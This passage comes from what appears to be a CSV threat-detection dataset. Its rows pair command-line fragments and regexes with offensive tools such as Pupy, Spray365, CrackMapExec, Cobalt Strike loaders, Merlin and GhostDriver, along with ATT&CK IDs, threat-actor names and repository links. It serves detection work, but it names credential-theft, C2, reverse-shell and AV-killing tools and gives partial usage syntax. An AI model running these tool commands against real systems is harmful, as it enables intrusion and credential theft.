OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* gen -S -f client -O windows -A x64*",".{0,1000}\sgen\s\-S\s\-f\sclient\s\-O\swindows\s\-A\sx64.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* generate audit -ep *--passwords_in_userfile*",".{0,1000}\sgenerate\saudit\s\-ep\s.{0,1000}\-\-passwords_in_userfile.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* generate normal -ep * -d * -u * -pf 
*",".{0,1000}\sgenerate\snormal\s\-ep\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-pf\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* generate normal -ep ex-plan.s365 *",".{0,1000}\sgenerate\snormal\s\-ep\sex\-plan\.s365\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* -generate -server * -setcradle bh.py*",".{0,1000}\s\-generate\s\-server\s.{0,1000}\s\-setcradle\sbh\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* -generate -setcradle pythonmemorymodule.py*",".{0,1000}\s\-generate\s\-setcradle\spythonmemorymodule\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* generate_bind_fuegoshell.ps1*",".{0,1000}\sgenerate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral 
Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "* generate_my_dll*",".{0,1000}\sgenerate_my_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "* generate_reverse_fuegoshell.ps1*",".{0,1000}\sgenerate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "* generatePayload*",".{0,1000}\sgeneratePayload.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 
'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --gen-relay-list *",".{0,1000}\s\-\-gen\-relay\-list\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks.
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --gen-relay-list /tmp/relaylistOutputFilename.txt*",".{0,1000}\s\-\-gen\-relay\-list\s\/tmp\/relaylistOutputFilename\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* get class-instances SMS_R_System *",".{0,1000}\sget\sclass\-instances\sSMS_R_System\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* get class-properties SMS_Admin*",".{0,1000}\sget\sclass\-properties\sSMS_Admin.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* get collection-members -n USERS*",".{0,1000}\sget\scollection\-members\s\-n\sUSERS.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* get primary-users -u *",".{0,1000}\sget\sprimary\-users\s\-u\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* get site-push-settings*",".{0,1000}\sget\ssite\-push\-settings.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "*-------------- Get System Priv with WebClient --------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sGet\sSystem\sPriv\swith\sWebClient\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "* get_keystrokes*",".{0,1000}\sget_keystrokes.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* get_netdomaincontroller*",".{0,1000}\sget_netdomaincontroller.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* get_netrdpsession*",".{0,1000}\sget_netrdpsession.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* get_rooot *",".{0,1000}\sget_rooot\s.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","0","N/A","N/A","3","203","44","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "* get_timedscreenshot*",".{0,1000}\sget_timedscreenshot.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' *",".{0,1000}\sGet\-ADReplAccount\s\-SamAccountName\s\'AZUREADSSOACC\$\'\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "* GetAppLockerPolicies*",".{0,1000}\sGetAppLockerPolicies.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "* Get-GPPPassword.ps1*",".{0,1000}\sGet\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Get-InfectedThread.ps1*",".{0,1000}\sGet\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Get-InjectedThread.ps1*",".{0,1000}\sGet\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* GetLsassPid*",".{0,1000}\sGetLsassPid.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential 
caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* GetNPUsers.py*",".{0,1000}\sGetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Get-OSTokenInformation.ps1*",".{0,1000}\sGet\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* 
GetPasswords.ps1*",".{0,1000}\sGetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* getprivs.c *",".{0,1000}\sgetprivs\.c\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* getprivs.o *",".{0,1000}\sgetprivs\.o\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* Get-ScheduledTaskComHandler.ps1*",".{0,1000}\sGet\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool 
also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Get-ServiceFromRegistry -Name Spooler*",".{0,1000}\sGet\-ServiceFromRegistry\s\-Name\sSpooler.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "* Get-SpoolStatus.ps1*",".{0,1000}\sGet\-SpoolStatus\.ps1.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "* --get-syscallstub *",".{0,1000}\s\-\-get\-syscallstub\s.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "* Get-TGSCipher.ps1*",".{0,1000}\sGet\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Ghauri is going to use the current database to 
enumerate table(s) entries*",".{0,1000}\sGhauri\sis\sgoing\sto\suse\sthe\scurrent\sdatabase\sto\senumerate\stable\(s\)\sentries.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "* GhostDriver.exe*",".{0,1000}\sGhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "* ghostdriver.sys*",".{0,1000}\sghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "* GhostTask.c *",".{0,1000}\sGhostTask\.c\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "* -GHUser * -GHRepo *",".{0,1000}\s\-GHUser\s.{0,1000}\s\-GHRepo\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 